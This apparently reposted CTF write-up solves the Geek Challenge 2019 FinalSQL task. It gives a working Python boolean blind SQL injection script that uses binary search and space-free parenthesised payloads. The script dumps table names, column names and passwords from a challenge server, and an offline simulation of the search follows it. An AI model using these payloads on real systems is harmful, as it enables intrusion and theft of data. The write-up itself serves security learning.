[SQL Blind Injection Notes] [Geek Challenge 2019] FinalSQL (Binary Search)

There is a lot of filtering on this challenge; spaces, for example, are blocked. We bypass that by wrapping every sub-expression in parentheses instead of separating keywords with whitespace, e.g. `from(F1naI1y)` instead of `from F1naI1y`. The target is also unstable: if requests are fired too quickly it starts returning errors, so the script sleeps briefly between requests. The page contains the word "Click" only when the injected condition is true, which gives us a boolean oracle, and a binary search over the printable ASCII range recovers each character in seven requests.

import time
import requests

# Instance URL from the challenge (changes with every BUUOJ instance)
url = "http://34e5371d-f910-48da-ae2e-26ed2b56eb8d.node3.buuoj.cn/search.php?id="

result = ''
i = 0

while True:
    i = i + 1
    # Search the printable ASCII range 32..126 for the i-th character
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        # Payloads contain no spaces: every sub-expression is wrapped in
        # parentheses, so `from(F1naI1y)` replaces `from F1naI1y`.
        # The earlier stages (database name, table names, column names)
        # are kept as comments; the active payload dumps the password column.
        # payload = '(ascii(substr(database(),%d,1))>%d)' % (i, mid)
        # payload = f'(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),{i},1))>{mid})'
        # payload = f'(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name="F1naI1y")),{i},1))>{mid})'
        payload = f'(ascii(substr((select(group_concat(password))from(F1naI1y)),{i},1))>{mid})'
        r = requests.get(url + payload)
        # print(r.text)
        # The target errors out under rapid-fire requests, so pause briefly
        time.sleep(0.1)
        # "Click" appears in the response only when the condition is true
        if "Click" in r.text:
            head = mid + 1
        else:
            tail = mid

    # Past the end of the string substr() returns '' and ascii('') is 0,
    # so every comparison is false and head stays at 32. Note that this
    # also stops the dump early if the data itself contains a space (ASCII 32).
    if head != 32:
        result += chr(head)
    else:
        break
    print(result)
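To check the search logic without a live target, here is an offline model of the same binary search. This is an added example and not part of the original writeup: a constructed in-memory table (`FAKE_DB`) stands in for F1naI1y, and `make_fake_oracle()` plays the role of the `"Click" in r.text` check, evaluating the same space-free payload shape the script sends. It generalizes the script in one respect: the search starts at 0 instead of 32, so `ascii('') = 0` is an unambiguous end-of-string marker and a space inside the data no longer truncates the dump. The names `FAKE_DB`, `PASSWORD_EXPR`, `build_payload`, `make_fake_oracle` and `extract` are this example's own.

```python
"""Offline model of the blind-SQLi binary search from the script above.

Added example, not the original writeup's code. There is no network here:
a constructed in-memory table stands in for F1naI1y, and a fake oracle
plays the role of the `"Click" in r.text` check, so the search logic can
be run and verified without a live target.
"""
import re

# Constructed sample data standing in for the challenge table. The value
# deliberately contains a space and the boundary characters '!' and '~'.
FAKE_DB = {"F1naI1y": {"password": "flag{a b~!}"}}

# The same space-free subquery the writeup uses for the final stage.
PASSWORD_EXPR = "(select(group_concat(password))from(F1naI1y))"

# The only payload shape the fake oracle understands (the writeup's own).
_PAYLOAD_RE = re.compile(
    r"\(ascii\(substr\(\(select\(group_concat\((\w+)\)\)from\((\w+)\)\),"
    r"(\d+),1\)\)>(\d+)\)"
)


def build_payload(expr: str, pos: int, threshold: int) -> str:
    """Boolean MySQL expression: is the pos-th character's code > threshold?

    Written without spaces, as the target's filter requires: every
    sub-expression is wrapped in parentheses instead of being separated
    by whitespace.
    """
    return f"(ascii(substr({expr},{pos},1))>{threshold})"


def make_fake_oracle(db):
    """Return (oracle, calls); oracle(payload) -> bool mimics the target.

    MySQL semantics that matter here: substr() is 1-based and returns ''
    past the end of the string, and ascii('') is 0. Every payload seen is
    appended to `calls` so the query count can be inspected.
    """
    calls = []

    def oracle(payload: str) -> bool:
        calls.append(payload)
        m = _PAYLOAD_RE.fullmatch(payload)
        if m is None:
            raise ValueError(f"unsupported payload: {payload}")
        column, table, pos, threshold = m.groups()
        value = db[table][column]
        ch = value[int(pos) - 1:int(pos)]   # '' when pos is past the end
        return (ord(ch) if ch else 0) > int(threshold)

    return oracle, calls


def extract(oracle, expr: str, max_len: int = 256) -> str:
    """Binary-search each character of `expr` through a boolean oracle.

    Unlike the script above, the search starts at 0 rather than 32, so
    ascii('') == 0 is an unambiguous end-of-string marker and a space
    inside the data (ASCII 32) no longer stops the dump early.
    """
    result = ""
    for pos in range(1, max_len + 1):
        head, tail = 0, 127
        while head < tail:
            mid = (head + tail) >> 1
            if oracle(build_payload(expr, pos, mid)):
                head = mid + 1      # code > mid: answer lies above mid
            else:
                tail = mid          # code <= mid: answer lies at or below mid
        if head == 0:               # substr() returned '': end of string
            break
        result += chr(head)
    return result


if __name__ == "__main__":
    oracle, calls = make_fake_oracle(FAKE_DB)
    secret = extract(oracle, PASSWORD_EXPR)
    print(secret, f"({len(calls)} queries, 7 per position)")
```

Because the interval 0..127 has length 127 = 2^7 - 1, each position costs exactly seven oracle queries whatever the character is, so an n-character value costs 7*(n+1) requests, the extra position being the one that detects the end of the string. Against the real target, swap `make_fake_oracle` for a function that sends `url + payload` with the sleep and tests for "Click", exactly as the script does.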



Origin blog.csdn.net/solitudi/article/details/108036582